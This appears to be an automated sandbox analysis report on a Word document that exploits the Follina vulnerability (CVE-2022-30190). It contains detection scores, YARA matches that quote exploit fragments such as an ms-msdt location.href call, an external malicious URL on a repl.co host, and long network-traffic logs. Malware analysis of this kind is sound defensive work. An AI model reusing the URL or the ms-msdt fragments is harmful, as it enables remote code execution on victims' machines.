Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
C1ZGt61uGv

Overview

General Information

Sample Name:C1ZGt61uGv (renamed file extension from none to docx)
Analysis ID:686026
MD5:98998af843c2c938c079a102abe6c73d
SHA1:b1a1dda90b3df0ba5f23430a6c55c48a9c3dbe9d
SHA256:b0cfd511498cbaed084fa622cfeb1a07de7478205cbff58cb40cb89091813593
Infos:

Detection

Follina CVE-2022-30190
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Contains an external reference to another file
Detected suspicious Microsoft Office reference URL
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2960 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x3d2:$a2: TargetMode="External"
  • 0x3ca:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x375:$olerel: relationships/oleObject
  • 0x38e:$target1: Target="http
  • 0x3d2:$mode: TargetMode="External
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
  • 0x2d0d:$a: PCWDiagnostic
  • 0x6177:$a: PCWDiagnostic
  • 0x2d01:$sa3: ms-msdt
  • 0x616b:$sa3: ms-msdt
  • 0x2d61:$sb3: IT_BrowseForFile=
  • 0x61cb:$sb3: IT_BrowseForFile=
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x1444:$a: PCWDiagnostic
    • 0x1438:$sa3: ms-msdt
    • 0x1498:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1427:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x1444:$a: PCWDiagnostic
    • 0x1438:$sa3: ms-msdt
    • 0x1498:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1427:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      Click to see the 7 entries
      No Sigma rule has matched
      Timestamp:35.186.245.55192.168.2.22443491762025010 08/18/22-04:23:24.931708
      SID:2025010
      Source Port:443
      Destination Port:49176
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:35.186.245.55192.168.2.22443491812025010 08/18/22-04:23:28.806682
      SID:2025010
      Source Port:443
      Destination Port:49181
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C1ZGt61uGv.docxAvira: detected
      Source: C1ZGt61uGv.docxVirustotal: Detection: 45%Perma Link
      Source: C1ZGt61uGv.docxMetadefender: Detection: 25%Perma Link
      Source: C1ZGt61uGv.docxReversingLabs: Detection: 35%
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G

      Exploits

      barindex
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\index[1].htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\535F33EE.htm, type: DROPPED
      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEAC362C.htm, type: DROPPED
      Source: document.xml.relsExtracted files from sample: https://dullghostwhitetwintext.karewen.repl.co/index.html!
      Source: unknownHTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 34.149.204.188:443 -> 192.168.2.22:49180 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: unknownHTTPS traffic detected: 35.186.245.55:443 -> 192.168.2.22:49173 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49174
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49175
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49176
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49177
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49178
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49179
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 34.149.204.188:443 -> 192.168.2.22:49180
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49181
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49182
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49182 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 35.186.245.55:443 -> 192.168.2.22:49183
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49183 -> 35.186.245.55:443
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficDNS query: name: dullghostwhitetwintext.karewen.repl.co
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 34.149.204.188:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 35.186.245.55:443
